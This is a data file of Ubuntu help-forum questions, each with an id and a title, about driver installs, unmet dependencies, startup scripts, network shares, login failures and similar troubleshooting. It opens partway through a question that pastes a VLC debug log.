enable-gnutls ' ' -- enable-jack ' ' -- enable-kate ' ' -- enable-libass ' ' -- enable-libmpeg2 ' ' -- enable-libproxy ' ' -- enable-libxml2 ' ' -- enable-lirc ' ' -- enable-live555 ' ' -- enable-mad ' ' -- enable-mkv ' ' -- enable-mod ' ' -- enable-mpc ' ' -- enable-mtp ' ' -- enable-mux_ogg ' ' -- enable-ncurses ' ' -- enable-notify ' ' -- enable-ogg ' ' -- enable-opus ' ' -- enable-oss ' ' -- enable-pulse ' ' -- enable-qt4 ' ' -- enable-realrtsp ' ' -- enable-samplerate ' ' -- enable-schroedinger ' ' -- enable-sdl ' ' -- enable-sftp ' ' -- enable-shout ' ' -- enable-skins2 ' ' -- enable-smb ' ' -- enable-speex ' ' -- enable-svg ' ' -- enable-taglib ' ' -- enable-theora ' ' -- enable-twolame ' ' -- enable-upnp ' ' -- enable-vcd ' ' -- enable-vcdx ' ' -- enable-vorbis ' ' -- enable-x264 ' ' -- enable-zvbi ' ' -- with-kde-solid=/usr/share/kde4/apps/solid/actions/ ' ' -- disable-dxva2 ' ' -- disable-gnomevfs ' ' -- disable-goom ' ' -- disable-portaudio ' ' -- disable-projectm ' ' -- disable-sqlite ' ' -- disable-telx ' ' -- enable-alsa ' ' -- enable-atmo ' ' -- enable-dc1394 ' ' -- enable-dv ' ' -- enable-fbosd ' ' -- enable-libva ' ' -- enable-linsys ' ' -- enable-omxil ' ' -- enable-pvr ' ' -- enable-udev ' ' -- enable-v4l2 ' ' -- enable-crystalhd ' ' -- enable-mmx ' ' -- enable-sse ' ' -- disable-neon ' ' -- disable-altivec ' 'build_alias=x86_64-linux-gnu' [ 0x9f4108 ] main libvlc debug : searching plug-in modules [ 0x9f4108 ] main libvlc debug : loading plugins cache file /usr/lib/vlc/plugins/plugins.dat [ 0x9f4108 ] main libvlc debug : recursively browsing `/usr/lib/vlc/plugins' [ 0x9f4108 ] main libvlc debug : saving plugins cache /usr/lib/vlc/plugins/plugins.dat [ 0x9f4108 ] main libvlc debug : plug-ins loaded : 422 modules [ 0x9f4108 ] main libvlc debug : opening config file ( /home/al/.config/vlc/vlcrc ) [ 0x9f4108 ] main libvlc debug : translation test : code is `` c '' [ 0x9f4108 ] main libvlc debug : cpu has capabilities mmx mmxext sse sse2 sse3 fpu [ 0x9f4108 ] main libvlc debug : looking for memcpy module : 4 candidates [ 0x9f4108 ] main libvlc debug : using memcpy module `` memcpymmxext '' [ 0xd46608 ] main input debug : creating an input for 'media library' [ 0xd46608 ] main input debug : input is a meta file : disabling unneeded options [ 0xd46608 ] main input debug : using timeshift granularity of 50 mib , in path '/tmp' [ 0xd46608 ] main input debug : `file/xspf-open : ///home/al/.local/share/vlc/ml.xspf ' gives access `file ' demux `xspf-open ' path `/home/al/.local/share/vlc/ml.xspf' [ 0xd46608 ] main input debug : creating demux : access='file ' demux='xspf-open ' location='/home/al/.local/share/vlc/ml.xspf ' file='/home/al/.local/share/vlc/ml.xspf' [ 0xa08038 ] main demux debug : looking for access_demux module : 3 candidates [ 0xa08038 ] main demux debug : no access_demux module matching `` file '' could be loaded [ 0xa08038 ] main demux debug : timer module_need ( ) : 1.655 ms - total 1.655 ms / 1 intvls ( avg 1.655 ms ) [ 0xd46608 ] main input debug : creating access 'file ' location='/home/al/.local/share/vlc/ml.xspf ' , path='/home/al/.local/share/vlc/ml.xspf' [ 0xc3ad58 ] main access debug : looking for access module : 2 candidates [ 0xc3ad58 ] filesystem access debug : opening file `/home/al/.local/share/vlc/ml.xspf' [ 0xc3ad58 ] main access debug : using access module `` filesystem '' [ 0xc3ad58 ] main access debug : timer module_need ( ) : 0.945 ms - total 0.945 ms / 1 intvls ( avg 0.945 ms ) [ 0xc3b588 ] main stream debug : using stream method for astream* [ 0xc3b588 ] main stream debug : starting pre-buffering [ 0xc3b588 ] main stream debug : received first data after 0 ms [ 0xc3b588 ] main stream debug : pre-buffering done 296 bytes in 0s - 1513 kib/s [ 0xa09f28 ] main stream debug : looking for stream_filter module : 7 candidates [ 0xa09f28 ] main stream debug : no stream_filter module matching `` any '' could be loaded [ 0xa09f28 ] main stream debug : timer module_need ( ) : 1.308 ms - total 1.308 ms / 1 intvls ( avg 1.308 ms ) [ 0xa09f28 ] main stream debug : looking for stream_filter module : 1 candidate [ 0xa09f28 ] main stream debug : using stream_filter module `` stream_filter_record '' [ 0xa09f28 ] main stream debug : timer module_need ( ) : 0.535 ms - total 0.535 ms / 1 intvls ( avg 0.535 ms ) [ 0xd46608 ] main input debug : creating demux : access='file ' demux='xspf-open ' location='/home/al/.local/share/vlc/ml.xspf ' file='/home/al/.local/share/vlc/ml.xspf' [ 0xa229b8 ] main demux debug : looking for demux module : 1 candidate [ 0xa229b8 ] playlist demux debug : using xspf playlist reader [ 0xa229b8 ] main demux debug : using demux module `` playlist '' [ 0xa229b8 ] main demux debug : timer module_need ( ) : 0.788 ms - total 0.788 ms / 1 intvls ( avg 0.788 ms ) [ 0xa232e8 ] main demux meta debug : looking for meta reader module : 2 candidates [ 0xa232e8 ] lua demux meta debug : trying lua scripts in /home/al/.local/share/vlc/lua/meta/reader [ 0xa232e8 ] lua demux meta debug : trying lua scripts in /usr/lib/vlc/lua/meta/reader [ 0xa232e8 ] lua demux meta debug : trying lua playlist script /usr/lib/vlc/lua/meta/reader/filename.luac [ 0xa232e8 ] lua demux meta debug : trying lua scripts in /usr/share/vlc/lua/meta/reader [ 0xa232e8 ] main demux meta debug : no meta reader module matching `` any '' could be loaded [ 0xa232e8 ] main demux meta debug : timer module_need ( ) : 3.368 ms - total 3.368 ms / 1 intvls ( avg 3.368 ms ) [ 0xd46608 ] main input debug : `file/xspf-open : ///home/al/.local/share/vlc/ml.xspf ' successfully opened [ 0xacb4e8 ] main xml reader debug : looking for xml reader module : 1 candidate [ 0xacb4e8 ] main xml reader debug : using xml reader module `` xml '' [ 0xacb4e8 ] main xml reader debug : timer module_need ( ) : 1.198 ms - total 1.198 ms / 1 intvls ( avg 1.198 ms ) [ 0xa229b8 ] playlist demux debug : parsed 0 tracks successfully [ 0xd46608 ] main input debug : eof reached [ 0xa229b8 ] main demux debug : removing module `` playlist '' [ 0xa09f28 ] main stream debug : removing module `` stream_filter_record '' [ 0xc3ad58 ] main access debug : removing module `` filesystem '' [ 0xd46608 ] main input debug : timer input launching for 'media library ' : 12.257 ms - total 12.257 ms / 1 intvls ( avg 12.257 ms ) [ 0xac8ec8 ] main interface debug : looking for interface module : 1 candidate [ 0xac8ec8 ] main interface debug : using interface module `` hotkeys '' [ 0xac8ec8 ] main interface debug : timer module_need ( ) : 0.638 ms - total 0.638 ms / 1 intvls ( avg 0.638 ms ) [ 0xd52e18 ] main interface debug : looking for interface module : 1 candidate [ 0xc38448 ] main playlist debug : playlist threads correctly activated [ 0xd52e18 ] main interface debug : using interface module `` inhibit '' [ 0xd52e18 ] main interface debug : timer module_need ( ) : 3.581 ms - total 3.581 ms / 1 intvls ( avg 3.581 ms ) [ 0xc3b588 ] main interface debug : looking for interface module : 1 candidate [ 0xc38448 ] main playlist debug : rebuilding array of current - root playlist [ 0xc3b588 ] main interface debug : using interface module `` globalhotkeys '' [ 0xc3b588 ] main interface debug : timer module_need ( ) : 1.561 ms - total 1.561 ms / 1 intvls ( avg 1.561 ms ) [ 0x9f4108 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . [ 0xc339f8 ] main interface debug : looking for interface module : 6 candidates [ 0xc38448 ] main playlist debug : rebuild done - 0 items , index -1 vlc settings from .cache and .local in user folder already deleted . but sometimes ( rarely ) it run normally and vlc window appear and it 's work ! does n't matter where vlc - from package or compiled from source . how to fix this ?
294129	how can i upgrade while having unmet dependencies ?	i just install a package that has these unmet dependencies : depends : sun-java5-jre but it is not installable or sun-java6-jre but it is not installable or openjdk-6-jre but it is not installed the above packages are not installable because i have install the newer version , the openjdk-7-jre and the program is working fine . looks like is has not updated its dependency list . how i will be able to overcome this and avoid having the apt-get complaining ? it does not let me do the apt-get upgrade . thank you
294130	blank screen after entering password on login screen after clonezilla restore	i get a blank screen after entering my login password at the ubuntu login screen . and after a short while the login screen is restored . any further attempts result in a similar cycle as before . this is happening inside vmware virtual machines . i had restored a partition from a clonezilla image to this ( virtual ) system . the source for the clonezilla image was a similar virtual system ( which is in perfect condition ) which only has one partition for everything . i can however login from the virtual terminals ( tty ) though , and also seem to have access to all my files . i also do n't get any error messages when i try to login from the virtual terminals . also restarting the lightdm service has n't helped either . there do n't seem to be any problematic lines in my .bashrc . i am running ubuntu 12.04.02 64-bit .
294131	graphic drivers	i just started using ubuntu yesterday , and i like it but i have several problems first i think i have to install graphics drivers , i installed steam and downloaded team fortress 2 , but it 's laggy.i have nvidia geforce gt 650 m and intel hd 4000 graphics card ( total 2 gb ) second one not sure how but shadow gone , no more problem : ) thank you everyone , have a nice day
294132	can i use a different graphical driver while booting , and the proprietery nvidia driver once my computer has started ?	i have a bit of a problem in that as i am booting my pc , the boot screen is n't exactly pretty because i am using the proprietary nvidia drivers . i am wondering if there is a method to use the vesa drivers while my computer boots to get the pretty splash screen ( either that , or make nvidia display the pretty splash screen -- i assume it is because of kernel mode setting that it does n't work properly ) any advise is much appreciated ! ( note : i can not use the nouveau drivers because they are faulty with my video card , making ubuntu particularly difficult to install [ nvidia gtx 580 ] )
294142	startup script does n't execute at startup	i have followed the tutorial here that shows how to setup the no-ip update program to start at system startup . i have done exactly as specified here , yet the program still does n't start . also , when i use sudo service noip2 start the service `` noip2 '' is n't recognized . how exactly can i take an arbitary script and set it to execute at startup . i have tried many tutorials about upstarts etc but none of them work . thanks . > 1 . execute the following commands at the terminal sudo chmod 700 /usr/local/bin/noip2 chown root : root /usr/local/bin/noip2 > > 2 . now create a shell script called “noip2.sh” in the directory /etc/init.d > # ! /bin/sh > # /etc/init.d/noip2.sh > > # supplied by no-ip.com > # modified for debian gnu/linux by eivind l. rygge > # corrected 1-17-2004 by alex docauer > > # . /etc/rc.d/init.d/functions # uncomment/modify for your killproc > > daemon=/usr/local/bin/noip2 name=noip2 > > test -x $ daemon || exit 0 > > case “ $ 1″ in start ) echo -n “starting dynamic address update : “ > start-stop-daemon –start –exec $ daemon echo “noip2.” ; ; stop ) echo -n > “shutting down dynamic address update : ” start-stop-daemon –stop > –oknodo –retry 30 –exec $ daemon echo “noip2.” ; ; > > restart ) echo -n “restarting dynamic address update : “ > start-stop-daemon –stop –oknodo –retry 30 –exec $ daemon > start-stop-daemon –start –exec $ daemon echo “noip2.” ; ; > > * ) echo “usage : $ 0 { start|stop|restart } ” exit 1 esac exit 0 > > 3 . now finally execute this command in terminal : sudo update-rc.d noip2.sh defaults 90
294145	easiest way to add a gui to a python code ?	i 'm planning out a raspberry pi project , and i want to make it very easy to use . my dad will be using it , and i 'd like for it to be usable without having to interact with the terminal . i just want a basic gui that prompts for values to be input , processes them , and allows my program to act on them . i want the values to be repeatedly used , but easy to change when the conditions change , there 's an error , etc . i thought the easiest way to do this would be a light weight ubuntu app , but i may be wrong . any suggestions ?
294146	dual screen misery , unable to install nvidia without crashing unity and turning machine into brick	i am currently on ubuntu 12.10 and have tried and failed to install a graphics card to run a dual screen . i am currently running the following graphics card , intel mobile series 4 . the machine is a dell . it 's also a 32 bit machine . i have tried everything to get nvidia ( or any other graphics card amd ) on this machine , but to no avail . everytime i follow some of the advice , unity shuts down and turns the computer into a brick - and i have to re-install ubuntu from scratch . the following was the latest example i followed , http : //falkvinge.net/2013/02/15/how-to-install-nvidia-drivers-in-ubuntu-12-10-quantal/ i am disappointed with ubuntu for not pre-installing these drives in the first place . wasted time in my opinion , trying to get a dual screen working . what i need to know ? am i better off upgrading to 13.04 ? is the intel graphics processor not going to work with nvidia ? is there anyone out there who resolved this situation with a machine with similar spec ? i am begging ubuntu to sort this out . my time could be better spent learning command line , and doing more productive things . any help would be gratefully accepted . update : i folowed the advice of nvidia installation was taken from here , http : //falkvinge.net/2013/02/15/how-to-install-nvidia-drivers-in-ubuntu-12-10-quantal/ this part is fine | sudo su | apt-get update | apt-get install linux-headers-generic | apt-get dist-upgrade | reboot the part where it goes wrong ... | sudo su | apt-get install nvidia-current-updates | nvidia-xconfig | reboot once this has been done and i reboot , there is just brick - no unity just login into truncated home screen with black colouring at the side . is there a potential conflict between intel grpahics cards and nvidia drives . i also must stree that the method set out by mr falkfinge is for 64-bit machine , i am running a 32-bit . again any help would be gratefully accepted .
294163	phablet-tools download problem	i have ubuntu 12 i386 running great from a 16 gig flash drive . i 'm trying to get the sudo apt-get install phablet-tools android-tools-adb android-tools-fastboot command to work . everything downloads fine save for the phablet-tools . it says the pacage contains unmet dependencies and is not installable ? any ideas ?
294164	e : malformed line 61	hello i am new to linux ( only installed today ) . i have an issue though which is `` this is a serious problem . try again later . if this problem appears again , please report an error to the developers . '' i get the following error message whenever i try to open package manager ( the system tells me to do so because `` installed packages have unmet dependencies '' . e : malformed line 61 in source list /etc/apt/sources.list ( dist parse ) i do n't know what to do and i have searched all over google to find a problem similar to mine , ( i tried going through how do i resolve unmet dependencies ? but it did n't help me ) thank you in advance for the help and i will give any further information i can , just remember that i may need quite a bit of explaining .
294167	windows share mounting for active directory in ubuntu	i have ubuntu 12.04 desktop edition . i have successfully installed likewise open and authenticated to the active directory in windows server 2008 r2 . i was unable to mount shares for those ad members . i finally found working solution : http : //techcommons.stanford.edu/topics/miscellaneous/mounting-active-directory-windows-cifs-file-share-ubuntu-linux sudo mount -t cifs //winservername/winsharename /media/winsharename -o username=sunetid , domain=win , iocharset=utf8 , file_mode=0777 , dir_mode=0777 however , i need it to be run right after log in for `` standard '' user without sudo password as a startup script . now ... i have seen many other ways however none that worked for me for some reason ... anyway- script requires three commands : mkdir to create directory as mount point chmod to make that directory accessible mount to actually mount the share when i do not see major problems in adding mount and mkdir for any user in visudo adding chmod is a bit troubling . so ... now i see two or rather two and half options : 1.i find some piece of software that will mount shares automatically using $ user as part of the path lets say 192.168.7.2/private/55555 55555 as user id after the user is logged into active directory 2.i find a way to grant those specific commands no password option with timer for lets say 20-30 sec so the user can log in , script executes the commands and no password fades leaving user with need for sudo for those commands . 2.5 i create some kind of credential file that will contain sudo password chmod it for 700 hide it somewhere in root and call password inside the script that will authenticate those 3 commands and then use sudo -k ( this resets the password timer right ? ) . hmm i have to add that i need solution really fast as i did not expect this as a problem and well.. i have a deadline to finish the project for college . i would really appreciate any help . if you know any way of getting those shares automount without sudo password that would be great . ps . there are about 50 users with private shares and about 10 shares that are public so anyone can see.. so each user needs 1 private for his/her id and all public shares visible .
294168	radeon x1550 catalyst 13.4 supported ?	i am trying to install a proprietary driver and the amd web site tells me to use catalyst driver 9.3 . i want the newest version of the driver i can get for this graphics card so will 13.4 work or will i have to use 9.3 ? also i am using 13.04 and is there anything else i should know about a non stock driver install and use ? any help i can get will be greatly appreciated as i am only a few months new to ubuntu and linux in general .
294172	what is the most sensible graphics driver to install for nvidia gtx 670mx and kubuntu 13.04 ?	just ( re ) installed kubuntu 13.04 . i broke my last installation after trying to install nvidia 's graphics driver . i would like to know whether i should install the nvidia driver , the bumblebee thing or something else entirely ... ? i am not a totally new to linux , but i 'm no expert on what i should be doing here . could someone please explain to me what software/drivers i should install for my graphics card , and how to go about installing such things . obviously this is a very specific question , so it might be difficult to answer . i 'm pretty certain this is an optimus enabled card , and i know there has been a lot of difficulty with drivers for them ... thanks for your help , ed bird note : question is not an exact duplicate because this is specific to hardware involved . also question should be left unclosed due to quality of answer given , which may help others .
294175	how to inspect localhost from my smartphone ?	ideally i 'd like to expose a port , like 8080 or something , to the web , so that i can run a website on my desktop and inspect it on my smart phone or show it to a client and so on . how do i expose one of my ports to the web in ubuntu ? i am typically working on a home wifi , i do n't have to mess with my router do i ? any help would rock ! update : i use node.js for a server , and when i navigate to 192.168.my.ip:8080 , i get a typical error message : unable to connect firefox ca n't establish a connection to the server at 173.52.xxx.xxx:8080 . the site could be temporarily unavailable or too busy . try again in a few moments . if you are unable to load any pages , check your computer 's network connection . if your computer or network is protected by a firewall or proxy , make sure that firefox is permitted to access the web . when i go to just my ip address , without a port , i 'm prompted by my isp to log in , which implies that there 's some kind of firewall ? update 2 : i figured it out : ) i needed to do some port forwarding and expose one port to tcp traffic . my router was rejecting all inbound requests , so i needed to create a temporary exception to the rule . ah , what a lonely productive saturday night . bittersweet , mostly bitter .
294180	broke my software center cache	software center wo n't start unless i run it as root . running it as root , there was a message about the cache being unwritable . my .cache folder is on a separate drive and symlinked to my home directory . interestingly , software center seemed to be working after that . i think it broke after i installed pidgin . here is the terminal output when i try to run software center as myself winobes @ epoch : ~ $ software-center 2013-05-11 19:53:54,872 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-05-11 19:53:54,881 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/db/database.py ' , 204 , '_get_new_xapiandb ' ) ' 2013-05-11 19:53:54,881 - root - warning - failed to add sca db could n't detect type of database 2013-05-11 19:53:54,958 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2013-05-11 19:53:54,957 - dbus.proxies - error - introspect error on com.ubuntu.sso : /com/ubuntu/sso/credentials : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 338 , in __init__ self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/appmanager.py '' , line 66 , in __init__ self.oauth_token = helper.find_oauth_token_sync ( ) file `` /usr/share/software-center/softwarecenter/backend/ubuntusso.py '' , line 141 , in find_oauth_token_sync sso.find_credentials ( ) file `` /usr/share/software-center/softwarecenter/backend/login_impl/login_sso.py '' , line 75 , in find_credentials self.proxy.find_credentials ( self.appname , self._get_params ( ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 and when i run as root : winobes @ epoch : ~ $ sudo software-center [ sudo ] password for winobes : 2013-05-11 19:55:20,352 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-05-11 19:55:21,000 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-05-11 19:55:21,002 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-05-11 19:55:21,005 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-05-11 19:55:21,005 - root - error - could not find any typelib for launchpadintegration ( software-center:28600 ) : ibus-warning ** : the owner of /home/winobes/.config/ibus/bus is not root ! 2013-05-11 19:55:21,044 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2013-05-11 19:55:23,322 - softwarecenter.ui.gtk3.widgets.exhibits - warning - download failed : ' < class 'gi._glib.gerror ' > ' , 'operation not supported' 2013-05-11 19:55:29,214 - softwarecenter.db.utils - info - software-center-agent finished with status 0 software center seems to work when i run with sudo , at least it launches . but it makes me kind of nervous , and i 'd like to be able to use the launcher ... things i have tried : sudo chown winobes ~/.cache sudo chown winobes ~/.cache/software-center sudo apt-get install -- reinstall software-center thanks for your help and insight : )
294182	underclock nvidia multiple monitor	i have a laptop with nvidia geforce go and nvidia drivers . my laptop screen is broken so i connect to an external monitor and disable the first . the nvidia gpu is constantly at highest and heats up my laptop . i still want the driver for 3d but i want to be able to control it . is there any hack i can do to underclock or switch to nouveau drivers and switch back to nvidia when neccesary ?
294184	i installed 12.04 but my user can not login	i can not login as my specified user , neither can i become root
294185	how would i calibrate a tablet pc ( pen input only ) screen ?	i have a 6-year old thinkpad x60 tablet . legendary laptop , though its screen is n't very well calibrated by default in ubuntu . the screen appears as a 'serial wacom tablet ' . is there a way to calibrate the screen on 13.04 ? i believe that the config file that used to have to be changed is n't in newer xorg versions .
294187	google chrome 64bit window drags on resize	it 's easy to tell what the problem is in the picture , but in chrome when i re-size the window everything kind of ... . drags . only chrome does this . i 've tried the 64 bit version of chrome , the 32 bit version , and now chromium . i got chromium from the software center . also , i 'm really new to linux . update : system specs lenovo y400 intel core i7 nvidia geforce gt 750m i just tried installing an nvidia driver from here and i got an error saying xorg drivers were already installed .
294190	stream ubuntu audio to remote xmbc	i have a raspberry pi set up with an xmbc media server that can accept airplay or upnp inputs over the local network . i 'd like to push audio streams to the pi . i have managed to make it work with android phones , windows pcs , but i 'm really struggling with ubuntu . i tried setting up pulseaudio explained in a couple of threads here ( e.g . this thread : how to stream music over the network to multiple computers ? ) . pulseaudio can recognise the xmbc device , but when i try to change the playback device ( playing music on spotify or youtube ) , it stops working . i also tried stream2ip , no luck . just wondering if someone has a suggestion how to make this work . many thanks
294191	is there a way to preinstall ubuntu ( so it shows the wizard to create an account , and orientation stuff , on first boot ) ?	is there some toolkit used by the oems of ubuntu to install ubuntu in such a way that it displays some wizard to create an account , and maybe show an orientation video . also , is there a way to preinstall some packages , also ?
294194	usb hard disk and usb flash drive keep unmounting and remounting	i wanted to backup some files on my external hard disk and just barely managed to do so , because it randomly unmounted and mounted again . my first thought was that the hard disk 's life is about to end . but then i also inserted my usb stick , which is brand new , and the same thing happened . does anyone have any idea what to do to fix this ? sorry if this has already been asked , but i really searched a lot to no avail , before posting here .
294197	not loading correctly after login	on a fresh install of ubuntu , right after logging in , the upper right fourth desktop , and the bar at the top of the screen ( i 'm new to linux , do n't know what it 's called yet ) , refuse to load properly , the desktop section staying black and the bar staying dark gray . it was left to sit , to see if it loaded , but there was not difference . does anyone know what is wrong ? edit : also , the mouse started off by moving fine , then went through longer and longer periods of freezing in one place before stopping completely . edit : after a reboot , the black section of the screen was gone , but everything else was the same . edit : both times , i was unable to launch applications .
294200	nintendo 64 emulation , confused with mupen 64pluse/m64py , project 64 freezes	i 'm in a huge pickle . i 'm trying to help a friend to whom i installed linux for . he is happy with it since he gave up that old xp . but the problem now that we are both faced with is playing our 64 games on linux . i installed project 64 through wine and it works at first but at a certian point it the frame rates drop dramaticly . him and i both have integrated 256 mbs intel graphics cards wich n64 should run very smoothly on . but anyway thinking that some sort of compatibility issue with directx9 in wine or something , i tried to install mupen64plus , and found myself not so happy that it is in command line i attempted to find a front end . i installed m64py , and it opens but it wants all these plugins , to wich i thought i had it all setup , then it wants a library file . i do not know where to look for one . i tried to google one . and save for compiling crap no dice . i do not want to compile a program i am not a programer . i am a linux newb and i am tryying to keep it basic . please help me . please help me friend . thank you .
294203	is there a way to find the executable name for an application so i can launch it in a terminal ?	is there a way to find the package/executable name ( for example , evince for document viewer , or totem for videos ) for an app ?
294204	how to set quodlibet as default music player ?	i am interested in having quodlibet show up in the `` default applications '' menu in system settings > details , how can i do this ?
294213	trouble with mounting usb hdd on ubuntu server	the hard disk had previously been the primary hdd for this computer . the only os ever installed was ubuntu server , without encryption or lvm . my intention is to only keep the files that were on /home/ but i ca n't seem to mount it . fdisk -l outputs : fdisk : unable to seek on /dev/sdb : invalid argument and dmesg | tail gives me : [ 61.946625 ] sd 5:0:0:0 : [ sdb ] no caching mode page present [ 61.946677 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 61.947264 ] sdb : sdb1 sdb2 < > [ 61.947266 ] sdb : partition table partially beyond eod , truncated [ 61.947270 ] sdb : p1 size 31206047744 extends beyond eod , truncated [ 61.947343 ] sdb : p2 start 31206080496 is beyond eod , truncated [ 61.948384 ] sd 5:0:0:0 : [ sdb ] 488378646 4096-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 61.950254 ] sd 5:0:0:0 : [ sdb ] no caching mode page present [ 61.950311 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 61.950375 ] sd 5:0:0:0 : [ sdb ] attached scsi disk any help would be really appreciated .
294215	what do i do about the `` haziness when booting up ubuntu ? ''	i have installed ubuntu 12.04 lts , the windows installer method , and when i restarted and booted up ubuntu , it was static and hazy . i rebooted back to windows 7 . i did like ubuntu for about two minutes , but that haziness was just too much , and i could barely read anything . i researched the problem , and people said it could be the graphics card i have . i am not tech savvy when it comes to computers , so i have no idea how to find out my graphics card model number or even change it . i have an hp pavilion dv2000 laptop with windows 7 installed . hopefully someone can help me .
294224	getting dropped to login-screen	i 'm having a serious problem since i updated to 13.04 recently . i keep getting dropped to the login-screeen . a bit of googling suggested it 's probably coused by something crashing my desktop . what happens is the screen turns black , sometimes there is some code flashing by , and then im delivered to the loginscreen . when i login , all programs are turned off , and more often than not , hours of work are lost . the code flashing by is different from time to time , but i 've noticed sometimes the words `` checking battery status '' . ( so far , every time this has happened , the charger has been plugged in ) i 'm inclined to think this might have some connection to the whole every time i log in again after this happens , i get the `` ubuntu has experienced an internal error '' dialog , and of course i report it . but this is getting out of hand , i need help , quick ! seems to occur at completely random occations , applications running last time it occured was : firefox , chromium , and tilda ( a drop down terminal application which i 've set to run at startup ) i considered posting my entire .xsession-errors file here , thinking it might help shed some light on what 's causing this but it 's quite a lot of text , anything i should be looking for in there ? any part of it that would be more interesting than the rest ( beginning/end ) ? thanks a lot for any help at all , this is driving me crazy !
294225	windows 8 does n't boot after installing ubuntu ( uefi )	i installed ubuntu with my uefi installation of windows 8 ( with windows 7 boot-loader because i do n't know how to recover it ) , and after grub installed , i was no longer able to boot windows 8 . i tried with several different tutorials , which resulted in the two menu entries called 'windows 7 ' that you 'll see in the pastebin output . i also disabled fastboot . it 's my first time with linux so this is a bit difficult for me to solve , and the existing answers seem incomplete . output from boot-repair : http : //paste.ubuntu.com/5656809/
294227	has anyone got ubuntu working on a pc tablet ?	i tried 12.10 and my acer iconia w700 was unusable , so i gave up and waited for 13.04 and it is unusable again . i can get tips when i click in the left toolbar thing and i managed to start firefox , but that is it . i ca n't get into settings . this is way more jarring than windows 8 . i really hoped ubuntu would save me from windows 8 , but it seems like a total fail . edges do nothing . the ui is unresponsive apart from hints and being able to drag boxes on the desktop . how can i get ubuntu working on this tablet ?
294232	odd nautilus behavior in raring on nfs shares	my wife upgraded to raring and is having strange behavior : when she browses her pictures and media ( nfs mounted through autofs ) with nautilus and she tries to scroll through the folder or just moving the mouse around in the window , nautilus will suddenly navigate up to the parent directory , sometimes all the way out of the nfs mounted directory . this is bizarre behavior . we have n't experienced these problems before the upgrade . my old t400 ( also running raring ) does not seem to have this issue , although it has different wireless card and a more capable processor . her system is a lowly 1ghz ( amd c-60 ) netbook that is very slow , and the wireless network sometimes has hiccups . i suspect nautilus is getting confused because maybe the mounted drive takes too long to respond or something like this . anyone else having similar behavior ?
294241	difficult problem - i 'll try to explain	ok , so my husband and i have had ubuntu 13.04 i believe for about a week now , or whenever they released it . yesterday , turn on the computer and his `` user '' and everything with it , was gone . mine , still very much in tact , however , the root password was changed . i have tried changing the password via the terminal after i tried removing it through the advanced root re-write option i found on the net , it showed there was n't an encrypted password to even remove . now , i have been trying to create a usb start up disk so i can re-install ubuntu , but i still do not have a root password apparently . this is obviously not my `` user '' password , as i have tried that . i 've tried every password i have ever used ... nothing .
294244	blank screen during booting	i 'm using ubuntu 12.04 along with windows7 . after choosing ubuntu from boot manager , many times i 'm getting only a black screen . i 'm not able to get gui or command line . startup ubuntu logo is not displayed . only thing that can be done is turning off the power . booting and restarting does n't help either . only if the laptop is kept idle for about an hour or two , ubuntu is booting properly . only once i got the message saying /dev/tmp not found while booting . please help me out
294249	huawei ec156 modem no longer detected after disconnected	i have just installed ubuntu 13.04 raring . now i 'm facing a problem with my huawei ec156 modem . at first it will work properly but it will disapear from network-manager if the modem is disconnected after online or removed from the usb slot . the 'enable mobile broadband ' would also disappear from network manager . the modem will appear again if i use it from windows and then run it again on ubuntu . if the modem is detected correctly , dmesg would show something like this : new usb device found , idvendor=12d1 , idproduct=140c but if it is not detected , dmesg would show this result : new usb device found , idvendor=12d1 , idproduct=1505 i have never seen this problem before in previous versions of ubuntu . how can i fix it ?
294251	how to recover faulty pam.d configuration ?	i am struggle to login after configured kerberos in pam.d . eventhough , i tried with root user , it also no use . i know , i did something wrong on that but how can i restore the pam.d configuration ? is there any way to login my account ? how can i restore my pam configuration files ?
294254	i need to increase swap space	i used the windows installer to install ubuntu . it did not ask me the size of swap . i am currently using ubuntu and have only about 200 mb and my system crashes when i open too many applications .
294256	not able to install vlc player or audacity ubuntu software center	when i try to install audacity through ubuntu software center , the screen initially shows : available from the `` universe '' source then , i click on use this source button on the right , and it asks for a password . but , after i enter my login password , the system shows progress 1 and later on gives the following error : failed to download repository information check your internet connection i have also tried to install vlc player but with similar results . can anyone help me in this respect as i am quite new to ubuntu platform ?
294257	connect to wifi network through ubuntu terminal	i am using my wifi network adapter on the laptop to connect to the internet on ubuntu 10.04 . i have tried the following steps and got the below messages on the ubuntu terminal . please let me know what has gone wrong . thank you . i have used the following instructions i have seen on a web page . open the terminal . type ifconfig wlan0 and press enter . you will not see any output in the terminal , as this command just turns your wireless card on . most wireless cards are designated wlan0 . if yours has a different designation , use that instead . type iwconfig wlan0 essid name key password and press enter . replace name with the actual network name , and replace password with the actual security key for the network . if your wireless network does not require a security key , do not enter key password . type dhclient wlan0 and press enter to obtain an ip address and connect to the wifi network . what i see on the terminal are given below .
